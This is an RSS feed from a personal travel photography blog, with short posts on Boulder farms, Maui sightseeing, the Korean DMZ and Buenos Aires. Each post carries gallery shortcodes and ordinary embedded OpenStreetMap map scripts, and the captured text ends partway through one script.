










































































<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Anne Dirkse</title>
	<atom:link href="http://www.annedirkse.com/?feed=rss2" rel="self" type="application/rss+xml" />
	<link>http://www.annedirkse.com</link>
	<description>the world, through my eyes</description>
	<lastBuildDate>Thu, 02 Sep 2010 14:21:00 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>Farms of Boulder County</title>
		<link>http://www.annedirkse.com/?p=1536</link>
		<comments>http://www.annedirkse.com/?p=1536#comments</comments>
		<pubDate>Fri, 18 Jun 2010 22:23:08 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Boulder]]></category>
		<category><![CDATA[boulder]]></category>
		<category><![CDATA[farms]]></category>
		<category><![CDATA[suburbia]]></category>

		<guid isPermaLink="false">http://www.annedirkse.com/?p=1536</guid>
		<description><![CDATA[I live on the rural outskirts of Boulder, Colorado and love the old farms that still remain. I wanted to photograph them because they are quickly being overrun by strip malls and suburban housing. [svgallery name="farms"]]]></description>
			<content:encoded><![CDATA[<p>I live on the rural outskirts of Boulder, Colorado and love the old farms that still remain.  I wanted to photograph them because they are quickly being overrun by strip malls and suburban housing.<br />
[svgallery name="farms"]<br />
<br/><br/></p>
]]></content:encoded>
			<wfw:commentRss>http://www.annedirkse.com/?feed=rss2&amp;p=1536</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Kihei</title>
		<link>http://www.annedirkse.com/?p=1520</link>
		<comments>http://www.annedirkse.com/?p=1520#comments</comments>
		<pubDate>Tue, 16 Feb 2010 21:45:50 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Hawaii]]></category>
		<category><![CDATA[beaches]]></category>
		<category><![CDATA[hawaii]]></category>
		<category><![CDATA[kihei]]></category>
		<category><![CDATA[maui]]></category>
		<category><![CDATA[sunsets]]></category>

		<guid isPermaLink="false">http://www.annedirkse.com/?p=1520</guid>
		<description><![CDATA[The coastline in Kihei was lovely. We spent almost every evening sitting out on the beach or the patio at Dolphin&#8217;s Point to watch the amazing sunset. [svgallery name="maui_kihei"]]]></description>
			<content:encoded><![CDATA[<p>The coastline in Kihei was lovely. We spent almost every evening sitting out on the beach or the patio at Dolphin&#8217;s Point to watch the amazing sunset.</p>
<p>[svgallery name="maui_kihei"]<br />
<br/><br/><br />
  <style type="text/css">#map_1 {padding: 0; margin: 0;}#map_1 img{padding: 0; margin: 0;border:none;margin-top:0px;margin-right:0px;margin-left:0px;margin-bottom:0px;}</style><div id="map_1" style="width:600px; height:450px; overflow:hidden;padding:0px;"><script type="text/javascript" src="http://www.openlayers.org/api/OpenLayers.js"></script><script type="text/javascript" src="http://www.openstreetmap.org/openlayers/OpenStreetMap.js"></script><script type="text/javascript">/* <![CDATA[ */(function($) { map = new OpenLayers.Map ("map_1", {            controls:[              new OpenLayers.Control.Navigation(),              new OpenLayers.Control.PanZoom(),              new OpenLayers.Control.Attribution()              ],          maxExtent: new OpenLayers.Bounds(-20037508.34,-20037508.34,20037508.34,20037508.34),          maxResolution: 156543.0399,          numZoomLevels: 19,          units: "m",          projection: new OpenLayers.Projection("EPSG:900913"),           displayProjection: new OpenLayers.Projection("EPSG:4326")      } );var layerMapnik = new OpenLayers.Layer.OSM.Mapnik("Mapnik");var layerTah    = new OpenLayers.Layer.OSM.Osmarender("Osmarender");var layerCycle  = new OpenLayers.Layer.OSM.CycleMap("CycleMap");map.addLayers([layerMapnik, layerTah, layerCycle]);map.addControl(new OpenLayers.Control.LayerSwitcher());    function osm_getTileURL(bounds) {        var res = this.map.getResolution();        var x = Math.round((bounds.left - this.maxExtent.left) / (res * this.tileSize.w));        var y = Math.round((this.maxExtent.top - bounds.top) / (res * this.tileSize.h));        var z = this.map.getZoom();        var limit = Math.pow(2, z);        if (y < 0 || y >= limit) {            return OpenLayers.Util.getImagesLocation() + "404.png";        } else {            x = ((x % limit) + limit) % limit;            return this.url + z + "/" + x + "/" + y + "." + this.type;        }    }var lonLat = new OpenLayers.LonLat(-156.477,20.776).transform(map.displayProjection,  map.projection);map.setCenter (lonLat,14);var markers = new OpenLayers.Layer.Markers( "Marker" );map.addLayer(markers);var data = {};data.icon = new OpenLayers.Icon("http://www.annedirkse.com/wp-content/plugins/osm/icons/marker_posts.png",     new OpenLayers.Size(2,2),     new OpenLayers.Pixel(-1, -1));var ll = new OpenLayers.LonLat(-156.478,20.775).transform(map.displayProjection,  map.projection);     var feature = new OpenLayers.Feature(markers, ll, data);feature.closeBox = true;feature.popupClass = OpenLayers.Class(OpenLayers.Popup.FramedCloud, {minSize: new OpenLayers.Size(150,150) } );feature.data.popupContentHTML = "";feature.data.overflow = "hidden";var marker = new OpenLayers.Marker(ll,data.icon.clone());marker.feature = feature;var markerClick = function(evt) {  if (this.popup == null) {    this.popup = this.createPopup(this.closeBox);    map.addPopup(this.popup);    this.popup.show();  }   else {    this.popup.toggle();  }  OpenLayers.Event.stop(evt);};marker.events.register("mousedown", feature, markerClick);markers.addMarker(marker);map.addPopup(feature.createPopup(feature.closeBox));})(jQuery)/* ]]&gt; */ </script></div></p>
]]></content:encoded>
			<wfw:commentRss>http://www.annedirkse.com/?feed=rss2&amp;p=1520</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The Road to Hana</title>
		<link>http://www.annedirkse.com/?p=1505</link>
		<comments>http://www.annedirkse.com/?p=1505#comments</comments>
		<pubDate>Mon, 15 Feb 2010 21:05:36 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Hawaii]]></category>
		<category><![CDATA[beaches]]></category>
		<category><![CDATA[black sand]]></category>
		<category><![CDATA[hawaii]]></category>
		<category><![CDATA[maui]]></category>
		<category><![CDATA[rainforests]]></category>
		<category><![CDATA[road to hana]]></category>

		<guid isPermaLink="false">http://www.annedirkse.com/?p=1505</guid>
		<description><![CDATA[The Road to Hana is an amazing day trip on Maui, or better, a two day trip.  The narrow, winding road overlooks tremendous ocean views, and black sand beaches, then retreats into dense rainforest punctuated by waterfalls. [svgallery name="maui_roadtohana"]]]></description>
			<content:encoded><![CDATA[<p>The Road to Hana is an amazing day trip on Maui, or better, a two day trip.  The narrow, winding road overlooks tremendous ocean views, and black sand beaches, then retreats into dense rainforest punctuated by waterfalls.</p>
<p>[svgallery name="maui_roadtohana"]</p>
<p><br/><br/></p>
<style type="text/css">#map_2 {padding: 0; margin: 0;}#map_2 img{padding: 0; margin: 0;border:none;margin-top:0px;margin-right:0px;margin-left:0px;margin-bottom:0px;}</style><div id="map_2" style="width:600px; height:450px; overflow:hidden;padding:0px;"><script type="text/javascript" src="http://www.openlayers.org/api/OpenLayers.js"></script><script type="text/javascript" src="http://www.openstreetmap.org/openlayers/OpenStreetMap.js"></script><script type="text/javascript">/* <![CDATA[ */(function($) { map = new OpenLayers.Map ("map_2", {            controls:[              new OpenLayers.Control.Navigation(),              new OpenLayers.Control.PanZoom(),              new OpenLayers.Control.Attribution()              ],          maxExtent: new OpenLayers.Bounds(-20037508.34,-20037508.34,20037508.34,20037508.34),          maxResolution: 156543.0399,          numZoomLevels: 19,          units: "m",          projection: new OpenLayers.Projection("EPSG:900913"),           displayProjection: new OpenLayers.Projection("EPSG:4326")      } );var layerMapnik = new OpenLayers.Layer.OSM.Mapnik("Mapnik");var layerTah    = new OpenLayers.Layer.OSM.Osmarender("Osmarender");var layerCycle  = new OpenLayers.Layer.OSM.CycleMap("CycleMap");map.addLayers([layerMapnik, layerTah, layerCycle]);map.addControl(new OpenLayers.Control.LayerSwitcher());    function osm_getTileURL(bounds) {        var res = this.map.getResolution();        var x = Math.round((bounds.left - this.maxExtent.left) / (res * this.tileSize.w));        var y = Math.round((this.maxExtent.top - bounds.top) / (res * this.tileSize.h));        var z = this.map.getZoom();        var limit = Math.pow(2, z);        if (y < 0 || y >= limit) {            return OpenLayers.Util.getImagesLocation() + "404.png";        } else {            x = ((x % limit) + limit) % limit;            return this.url + z + "/" + x + "/" + y + "." + this.type;        }    }var lonLat = new OpenLayers.LonLat(-156.16,20.845).transform(map.displayProjection,  map.projection);map.setCenter (lonLat,11);var markers = new OpenLayers.Layer.Markers( "Marker" );map.addLayer(markers);var data = {};data.icon = new OpenLayers.Icon("http://www.annedirkse.com/wp-content/plugins/osm/icons/marker_posts.png",     new OpenLayers.Size(2,2),     new OpenLayers.Pixel(-1, -1));var ll = new OpenLayers.LonLat(-156.178,20.819).transform(map.displayProjection,  map.projection);     var feature = new OpenLayers.Feature(markers, ll, data);feature.closeBox = true;feature.popupClass = OpenLayers.Class(OpenLayers.Popup.FramedCloud, {minSize: new OpenLayers.Size(150,150) } );feature.data.popupContentHTML = "";feature.data.overflow = "hidden";var marker = new OpenLayers.Marker(ll,data.icon.clone());marker.feature = feature;var markerClick = function(evt) {  if (this.popup == null) {    this.popup = this.createPopup(this.closeBox);    map.addPopup(this.popup);    this.popup.show();  }   else {    this.popup.toggle();  }  OpenLayers.Event.stop(evt);};marker.events.register("mousedown", feature, markerClick);markers.addMarker(marker);map.addPopup(feature.createPopup(feature.closeBox));})(jQuery)/* ]]&gt; */ </script></div>
]]></content:encoded>
			<wfw:commentRss>http://www.annedirkse.com/?feed=rss2&amp;p=1505</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Haleakalā Crater</title>
		<link>http://www.annedirkse.com/?p=1476</link>
		<comments>http://www.annedirkse.com/?p=1476#comments</comments>
		<pubDate>Sun, 14 Feb 2010 19:30:19 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Hawaii]]></category>
		<category><![CDATA[haleakala]]></category>
		<category><![CDATA[hawaii]]></category>
		<category><![CDATA[maui]]></category>
		<category><![CDATA[sunrise]]></category>
		<category><![CDATA[us national parks]]></category>
		<category><![CDATA[volcanoes]]></category>

		<guid isPermaLink="false">http://www.annedirkse.com/?p=1476</guid>
		<description><![CDATA[Sunrise at Haleakala Crater is spectacular when it isn&#8217;t cloudy at the top. My mom and I decided to get up well before dawn and risk it if the skies looked reasonably clear from the shore.  After a little GPS mishap we wound our way...]]></description>
			<content:encoded><![CDATA[<p>Sunrise at <a href='http://en.wikipedia.org/wiki/Haleakalā' target='_blank'>Haleakala Crater</a> is spectacular when it isn&#8217;t  cloudy at the top. My mom and I decided to get up well before dawn and  risk it if the skies looked reasonably clear from the shore.  After a  little GPS mishap we wound our way up the windy mountain to the top,  just in time for dawn.  It was spectacular, as were the banana macadamia  pancakes we found on the way back down.</p>
<p>[svgallery name="maui_haleakala"]</p>
<p>&lt;br/&gt;&lt;br/&gt;</p>
<style type="text/css">#map_3 {padding: 0; margin: 0;}#map_3 img{padding: 0; margin: 0;border:none;margin-top:0px;margin-right:0px;margin-left:0px;margin-bottom:0px;}</style><div id="map_3" style="width:600px; height:450px; overflow:hidden;padding:0px;"><script type="text/javascript" src="http://www.openlayers.org/api/OpenLayers.js"></script><script type="text/javascript" src="http://www.openstreetmap.org/openlayers/OpenStreetMap.js"></script><script type="text/javascript">/* <![CDATA[ */(function($) { map = new OpenLayers.Map ("map_3", {            controls:[              new OpenLayers.Control.Navigation(),              new OpenLayers.Control.PanZoom(),              new OpenLayers.Control.Attribution()              ],          maxExtent: new OpenLayers.Bounds(-20037508.34,-20037508.34,20037508.34,20037508.34),          maxResolution: 156543.0399,          numZoomLevels: 19,          units: "m",          projection: new OpenLayers.Projection("EPSG:900913"),           displayProjection: new OpenLayers.Projection("EPSG:4326")      } );var layerMapnik = new OpenLayers.Layer.OSM.Mapnik("Mapnik");var layerTah    = new OpenLayers.Layer.OSM.Osmarender("Osmarender");var layerCycle  = new OpenLayers.Layer.OSM.CycleMap("CycleMap");map.addLayers([layerMapnik, layerTah, layerCycle]);map.addControl(new OpenLayers.Control.LayerSwitcher());    function osm_getTileURL(bounds) {        var res = this.map.getResolution();        var x = Math.round((bounds.left - this.maxExtent.left) / (res * this.tileSize.w));        var y = Math.round((this.maxExtent.top - bounds.top) / (res * this.tileSize.h));        var z = this.map.getZoom();        var limit = Math.pow(2, z);        if (y < 0 || y >= limit) {            return OpenLayers.Util.getImagesLocation() + "404.png";        } else {            x = ((x % limit) + limit) % limit;            return this.url + z + "/" + x + "/" + y + "." + this.type;        }    }var lonLat = new OpenLayers.LonLat(-156.265,20.728).transform(map.displayProjection,  map.projection);map.setCenter (lonLat,13);var markers = new OpenLayers.Layer.Markers( "Marker" );map.addLayer(markers);var data = {};data.icon = new OpenLayers.Icon("http://www.annedirkse.com/wp-content/plugins/osm/icons/marker_posts.png",     new OpenLayers.Size(2,2),     new OpenLayers.Pixel(-1, -1));var ll = new OpenLayers.LonLat(-156.258,20.727).transform(map.displayProjection,  map.projection);     var feature = new OpenLayers.Feature(markers, ll, data);feature.closeBox = true;feature.popupClass = OpenLayers.Class(OpenLayers.Popup.FramedCloud, {minSize: new OpenLayers.Size(150,150) } );feature.data.popupContentHTML = "";feature.data.overflow = "hidden";var marker = new OpenLayers.Marker(ll,data.icon.clone());marker.feature = feature;var markerClick = function(evt) {  if (this.popup == null) {    this.popup = this.createPopup(this.closeBox);    map.addPopup(this.popup);    this.popup.show();  }   else {    this.popup.toggle();  }  OpenLayers.Event.stop(evt);};marker.events.register("mousedown", feature, markerClick);markers.addMarker(marker);map.addPopup(feature.createPopup(feature.closeBox));})(jQuery)/* ]]&gt; */ </script></div>
]]></content:encoded>
			<wfw:commentRss>http://www.annedirkse.com/?feed=rss2&amp;p=1476</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Whale Watching</title>
		<link>http://www.annedirkse.com/?p=1515</link>
		<comments>http://www.annedirkse.com/?p=1515#comments</comments>
		<pubDate>Sat, 13 Feb 2010 21:34:42 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Hawaii]]></category>
		<category><![CDATA[hawaii]]></category>
		<category><![CDATA[humpbacks]]></category>
		<category><![CDATA[maui]]></category>
		<category><![CDATA[whales]]></category>

		<guid isPermaLink="false">http://www.annedirkse.com/?p=1515</guid>
		<description><![CDATA[In February the Humpback whales are in Hawaii and we were lucky enough to have a superb day of whale-watching, one that the Pacific Whale Foundation guides said was remarkable in that we were surrounded by a group of 5 or 6 whales that were...]]></description>
			<content:encoded><![CDATA[<p>In February the <a href='http://en.wikipedia.org/wiki/Humpback_whale' target='_blank'>Humpback whales</a> are in Hawaii and we were lucky enough to have a superb day of whale-watching, one that the Pacific Whale Foundation guides said was remarkable in that we were surrounded by a group of 5 or 6 whales that were playing and diving under the boat.  It was a truly amazing experience.</p>
<p>[svgallery name="maui_whalewatching"]</p>
<p><br/><br/><br />
<style type="text/css">#map_4 {padding: 0; margin: 0;}#map_4 img{padding: 0; margin: 0;border:none;margin-top:0px;margin-right:0px;margin-left:0px;margin-bottom:0px;}</style><div id="map_4" style="width:600px; height:450px; overflow:hidden;padding:0px;"><script type="text/javascript" src="http://www.openlayers.org/api/OpenLayers.js"></script><script type="text/javascript" src="http://www.openstreetmap.org/openlayers/OpenStreetMap.js"></script><script type="text/javascript">/* <![CDATA[ */(function($) { map = new OpenLayers.Map ("map_4", {            controls:[              new OpenLayers.Control.Navigation(),              new OpenLayers.Control.PanZoom(),              new OpenLayers.Control.Attribution()              ],          maxExtent: new OpenLayers.Bounds(-20037508.34,-20037508.34,20037508.34,20037508.34),          maxResolution: 156543.0399,          numZoomLevels: 19,          units: "m",          projection: new OpenLayers.Projection("EPSG:900913"),           displayProjection: new OpenLayers.Projection("EPSG:4326")      } );var layerMapnik = new OpenLayers.Layer.OSM.Mapnik("Mapnik");var layerTah    = new OpenLayers.Layer.OSM.Osmarender("Osmarender");var layerCycle  = new OpenLayers.Layer.OSM.CycleMap("CycleMap");map.addLayers([layerMapnik, layerTah, layerCycle]);map.addControl(new OpenLayers.Control.LayerSwitcher());    function osm_getTileURL(bounds) {        var res = this.map.getResolution();        var x = Math.round((bounds.left - this.maxExtent.left) / (res * this.tileSize.w));        var y = Math.round((this.maxExtent.top - bounds.top) / (res * this.tileSize.h));        var z = this.map.getZoom();        var limit = Math.pow(2, z);        if (y < 0 || y >= limit) {            return OpenLayers.Util.getImagesLocation() + "404.png";        } else {            x = ((x % limit) + limit) % limit;            return this.url + z + "/" + x + "/" + y + "." + this.type;        }    }var lonLat = new OpenLayers.LonLat(-156.484,20.638).transform(map.displayProjection,  map.projection);map.setCenter (lonLat,13);var markers = new OpenLayers.Layer.Markers( "Marker" );map.addLayer(markers);var data = {};data.icon = new OpenLayers.Icon("http://www.annedirkse.com/wp-content/plugins/osm/icons/marker_posts.png",     new OpenLayers.Size(2,2),     new OpenLayers.Pixel(-1, -1));var ll = new OpenLayers.LonLat(-156.487,20.637).transform(map.displayProjection,  map.projection);     var feature = new OpenLayers.Feature(markers, ll, data);feature.closeBox = true;feature.popupClass = OpenLayers.Class(OpenLayers.Popup.FramedCloud, {minSize: new OpenLayers.Size(150,150) } );feature.data.popupContentHTML = "";feature.data.overflow = "hidden";var marker = new OpenLayers.Marker(ll,data.icon.clone());marker.feature = feature;var markerClick = function(evt) {  if (this.popup == null) {    this.popup = this.createPopup(this.closeBox);    map.addPopup(this.popup);    this.popup.show();  }   else {    this.popup.toggle();  }  OpenLayers.Event.stop(evt);};marker.events.register("mousedown", feature, markerClick);markers.addMarker(marker);map.addPopup(feature.createPopup(feature.closeBox));})(jQuery)/* ]]&gt; */ </script></div></p>
]]></content:encoded>
			<wfw:commentRss>http://www.annedirkse.com/?feed=rss2&amp;p=1515</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Snorkeling at Molokini</title>
		<link>http://www.annedirkse.com/?p=1494</link>
		<comments>http://www.annedirkse.com/?p=1494#comments</comments>
		<pubDate>Sat, 13 Feb 2010 20:57:23 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Hawaii]]></category>
		<category><![CDATA[craters]]></category>
		<category><![CDATA[fish]]></category>
		<category><![CDATA[hawaii]]></category>
		<category><![CDATA[maui]]></category>
		<category><![CDATA[molokini]]></category>
		<category><![CDATA[snorkeling]]></category>
		<category><![CDATA[turtles]]></category>
		<category><![CDATA[volcanoes]]></category>

		<guid isPermaLink="false">http://www.annedirkse.com/?p=1494</guid>
		<description><![CDATA[The Molokini Crater off the shores of Maui is lovely and is supposed to be a lovely place to snorkel, but out experience was not so great.  There were so many boats of snorkelers, and hardly any fish, so old ladies and kids with &#8216;noodles&#8217;...]]></description>
			<content:encoded><![CDATA[<p>The <a href='http://en.wikipedia.org/wiki/Molokini' target='_blank'>Molokini Crater</a> off the shores of Maui is lovely and is supposed to be a lovely place to snorkel, but out experience was not so great.  There were so many boats of snorkelers, and hardly any fish, so old ladies and kids with &#8216;noodles&#8217; would hit  you two or three times for every fish you saw. It was a little better when we stopped off of Maui to look for sea turtles.  That wasn&#8217;t nearly so congested, and we saw some turtles, too.</p>
<p>[svgallery name="maui_snorkeling"]<br />
<br/><br/><br />
<style type="text/css">#map_5 {padding: 0; margin: 0;}#map_5 img{padding: 0; margin: 0;border:none;margin-top:0px;margin-right:0px;margin-left:0px;margin-bottom:0px;}</style><div id="map_5" style="width:600px; height:450px; overflow:hidden;padding:0px;"><script type="text/javascript" src="http://www.openlayers.org/api/OpenLayers.js"></script><script type="text/javascript" src="http://www.openstreetmap.org/openlayers/OpenStreetMap.js"></script><script type="text/javascript">/* <![CDATA[ */(function($) { map = new OpenLayers.Map ("map_5", {            controls:[              new OpenLayers.Control.Navigation(),              new OpenLayers.Control.PanZoom(),              new OpenLayers.Control.Attribution()              ],          maxExtent: new OpenLayers.Bounds(-20037508.34,-20037508.34,20037508.34,20037508.34),          maxResolution: 156543.0399,          numZoomLevels: 19,          units: "m",          projection: new OpenLayers.Projection("EPSG:900913"),           displayProjection: new OpenLayers.Projection("EPSG:4326")      } );var layerMapnik = new OpenLayers.Layer.OSM.Mapnik("Mapnik");var layerTah    = new OpenLayers.Layer.OSM.Osmarender("Osmarender");var layerCycle  = new OpenLayers.Layer.OSM.CycleMap("CycleMap");map.addLayers([layerMapnik, layerTah, layerCycle]);map.addControl(new OpenLayers.Control.LayerSwitcher());    function osm_getTileURL(bounds) {        var res = this.map.getResolution();        var x = Math.round((bounds.left - this.maxExtent.left) / (res * this.tileSize.w));        var y = Math.round((this.maxExtent.top - bounds.top) / (res * this.tileSize.h));        var z = this.map.getZoom();        var limit = Math.pow(2, z);        if (y < 0 || y >= limit) {            return OpenLayers.Util.getImagesLocation() + "404.png";        } else {            x = ((x % limit) + limit) % limit;            return this.url + z + "/" + x + "/" + y + "." + this.type;        }    }var lonLat = new OpenLayers.LonLat(-156.484,20.638).transform(map.displayProjection,  map.projection);map.setCenter (lonLat,13);var markers = new OpenLayers.Layer.Markers( "Marker" );map.addLayer(markers);var data = {};data.icon = new OpenLayers.Icon("http://www.annedirkse.com/wp-content/plugins/osm/icons/marker_posts.png",     new OpenLayers.Size(2,2),     new OpenLayers.Pixel(-1, -1));var ll = new OpenLayers.LonLat(-156.487,20.637).transform(map.displayProjection,  map.projection);     var feature = new OpenLayers.Feature(markers, ll, data);feature.closeBox = true;feature.popupClass = OpenLayers.Class(OpenLayers.Popup.FramedCloud, {minSize: new OpenLayers.Size(150,150) } );feature.data.popupContentHTML = "";feature.data.overflow = "hidden";var marker = new OpenLayers.Marker(ll,data.icon.clone());marker.feature = feature;var markerClick = function(evt) {  if (this.popup == null) {    this.popup = this.createPopup(this.closeBox);    map.addPopup(this.popup);    this.popup.show();  }   else {    this.popup.toggle();  }  OpenLayers.Event.stop(evt);};marker.events.register("mousedown", feature, markerClick);markers.addMarker(marker);map.addPopup(feature.createPopup(feature.closeBox));})(jQuery)/* ]]&gt; */ </script></div></p>
]]></content:encoded>
			<wfw:commentRss>http://www.annedirkse.com/?feed=rss2&amp;p=1494</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>North Korean Currency</title>
		<link>http://www.annedirkse.com/?p=1467</link>
		<comments>http://www.annedirkse.com/?p=1467#comments</comments>
		<pubDate>Tue, 09 Feb 2010 18:40:34 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Korea]]></category>
		<category><![CDATA[currency]]></category>
		<category><![CDATA[DMZ]]></category>
		<category><![CDATA[north korea]]></category>
		<category><![CDATA[panmunjeom]]></category>

		<guid isPermaLink="false">http://www.annedirkse.com/?p=1467</guid>
		<description><![CDATA[There was North Korean currency available for sale at the shop in Panmunjeom. I found the images striking and memorable. There was also North Korean soju for sale, which was also striking, but not quite as memorable. [svgallery name="nkcurrency"]]]></description>
			<content:encoded><![CDATA[<p>There was North Korean currency available for sale at the shop in Panmunjeom.  I found the images striking and memorable. There was also North Korean <a href='http://en.wikipedia.org/wiki/soju' target='_blank'>soju</a> for sale, which was also striking, but not quite as memorable.</p>
<p>[svgallery name="nkcurrency"]  </p>
]]></content:encoded>
			<wfw:commentRss>http://www.annedirkse.com/?feed=rss2&amp;p=1467</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The Korean DMZ</title>
		<link>http://www.annedirkse.com/?p=1441</link>
		<comments>http://www.annedirkse.com/?p=1441#comments</comments>
		<pubDate>Mon, 08 Feb 2010 18:39:07 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Korea]]></category>
		<category><![CDATA[border crossings]]></category>
		<category><![CDATA[DMZ]]></category>
		<category><![CDATA[JSA]]></category>
		<category><![CDATA[military]]></category>
		<category><![CDATA[north korea]]></category>
		<category><![CDATA[panmunjeom]]></category>
		<category><![CDATA[south korea]]></category>

		<guid isPermaLink="false">http://www.annedirkse.com/?p=1441</guid>
		<description><![CDATA[Most of the time when I set out on a vacation I decide to take a real adventure. But work trips are a different kind of travel and I get a lot out of them too. I expected that my first work trip to Seoul...]]></description>
			<content:encoded><![CDATA[<p>Most of the time when I set out on a vacation I decide to take a real adventure.  But work trips are a different kind of travel and I get a lot out of them too.  I expected that my first work trip to Seoul would bring me lots of new experiences, but I didn&#8217;t figure that it would be anything quite as adventurous as a trip to the DMZ, and especially stepping across the northern side of the Military Demarcation Line.</p>
<style type="text/css">#map_6 {padding: 0; margin: 0;}#map_6 img{padding: 0; margin: 0;border:none;margin-top:0px;margin-right:0px;margin-left:0px;margin-bottom:0px;}</style><div id="map_6" style="width:600px; height:450px; overflow:hidden;padding:0px;"><script type="text/javascript" src="http://www.openlayers.org/api/OpenLayers.js"></script><script type="text/javascript" src="http://www.openstreetmap.org/openlayers/OpenStreetMap.js"></script><script type="text/javascript">/* <![CDATA[ */(function($) { map = new OpenLayers.Map ("map_6", {            controls:[              new OpenLayers.Control.Navigation(),              new OpenLayers.Control.PanZoom(),              new OpenLayers.Control.Attribution()              ],          maxExtent: new OpenLayers.Bounds(-20037508.34,-20037508.34,20037508.34,20037508.34),          maxResolution: 156543.0399,          numZoomLevels: 19,          units: "m",          projection: new OpenLayers.Projection("EPSG:900913"),           displayProjection: new OpenLayers.Projection("EPSG:4326")      } );var layerMapnik = new OpenLayers.Layer.OSM.Mapnik("Mapnik");var layerTah    = new OpenLayers.Layer.OSM.Osmarender("Osmarender");var layerCycle  = new OpenLayers.Layer.OSM.CycleMap("CycleMap");map.addLayers([layerMapnik, layerTah, layerCycle]);map.addControl(new OpenLayers.Control.LayerSwitcher());    function osm_getTileURL(bounds) {        var res = this.map.getResolution();        var x = Math.round((bounds.left - this.maxExtent.left) / (res * this.tileSize.w));        var y = Math.round((this.maxExtent.top - bounds.top) / (res * this.tileSize.h));        var z = this.map.getZoom();        var limit = Math.pow(2, z);        if (y < 0 || y >= limit) {            return OpenLayers.Util.getImagesLocation() + "404.png";        } else {            x = ((x % limit) + limit) % limit;            return this.url + z + "/" + x + "/" + y + "." + this.type;        }    }var lonLat = new OpenLayers.LonLat(126.715,37.941).transform(map.displayProjection,  map.projection);map.setCenter (lonLat,11);var markers = new OpenLayers.Layer.Markers( "Marker" );map.addLayer(markers);var data = {};data.icon = new OpenLayers.Icon("http://www.annedirkse.com/wp-content/plugins/osm/icons/marker_posts.png",     new OpenLayers.Size(2,2),     new OpenLayers.Pixel(-1, -1));var ll = new OpenLayers.LonLat(126.704,37.943).transform(map.displayProjection,  map.projection);     var feature = new OpenLayers.Feature(markers, ll, data);feature.closeBox = true;feature.popupClass = OpenLayers.Class(OpenLayers.Popup.FramedCloud, {minSize: new OpenLayers.Size(150,150) } );feature.data.popupContentHTML = "";feature.data.overflow = "hidden";var marker = new OpenLayers.Marker(ll,data.icon.clone());marker.feature = feature;var markerClick = function(evt) {  if (this.popup == null) {    this.popup = this.createPopup(this.closeBox);    map.addPopup(this.popup);    this.popup.show();  }   else {    this.popup.toggle();  }  OpenLayers.Event.stop(evt);};marker.events.register("mousedown", feature, markerClick);markers.addMarker(marker);map.addPopup(feature.createPopup(feature.closeBox));})(jQuery)/* ]]&gt; */ </script></div>
]]></content:encoded>
			<wfw:commentRss>http://www.annedirkse.com/?feed=rss2&amp;p=1441</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cementario de Recoleta, II</title>
		<link>http://www.annedirkse.com/?p=1293</link>
		<comments>http://www.annedirkse.com/?p=1293#comments</comments>
		<pubDate>Sat, 05 Dec 2009 19:38:51 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Buenos Aires]]></category>
		<category><![CDATA[Argentina]]></category>
		<category><![CDATA[cemetaries]]></category>
		<category><![CDATA[recoleta]]></category>

		<guid isPermaLink="false">http://www.annedirkse.com/?p=1293</guid>
		<description><![CDATA[I was in Buenos Aires for some work and vacation time and decided to take my camera back to have another pass through the lovely cementario de Recoleta. It was an amazing day of popcorn clouds and blue skies mixed with low clouds moving in....]]></description>
			<content:encoded><![CDATA[<p>I was in Buenos Aires for some work and vacation time and decided to take my camera back to have another pass through the lovely cementario de Recoleta.  It was an amazing day of popcorn clouds and blue skies mixed with low clouds moving in. There was a lot of repair going on at the cemetery.</p>
<p>[svgallery name="recoleta"]<br />
<br/><br/><br />
<style type="text/css">#map_7 {padding: 0; margin: 0;}#map_7 img{padding: 0; margin: 0;border:none;margin-top:0px;margin-right:0px;margin-left:0px;margin-bottom:0px;}</style><div id="map_7" style="width:600px; height:450px; overflow:hidden;padding:0px;"><script type="text/javascript" src="http://www.openlayers.org/api/OpenLayers.js"></script><script type="text/javascript" src="http://www.openstreetmap.org/openlayers/OpenStreetMap.js"></script><script type="text/javascript">/* <![CDATA[ */(function($) { map = new OpenLayers.Map ("map_7", {            controls:[              new OpenLayers.Control.Navigation(),              new OpenLayers.Control.PanZoom(),              new OpenLayers.Control.Attribution()              ],          maxExtent: new OpenLayers.Bounds(-20037508.34,-20037508.34,20037508.34,20037508.34),          maxResolution: 156543.0399,          numZoomLevels: 19,          units: "m",          projection: new OpenLayers.Projection("EPSG:900913"),           displayProjection: new OpenLayers.Projection("EPSG:4326")      } );var layerMapnik = new OpenLayers.Layer.OSM.Mapnik("Mapnik");var layerTah    = new OpenLayers.Layer.OSM.Osmarender("Osmarender");var layerCycle  = new OpenLayers.Layer.OSM.CycleMap("CycleMap");map.addLayers([layerMapnik, layerTah, layerCycle]);map.addControl(new 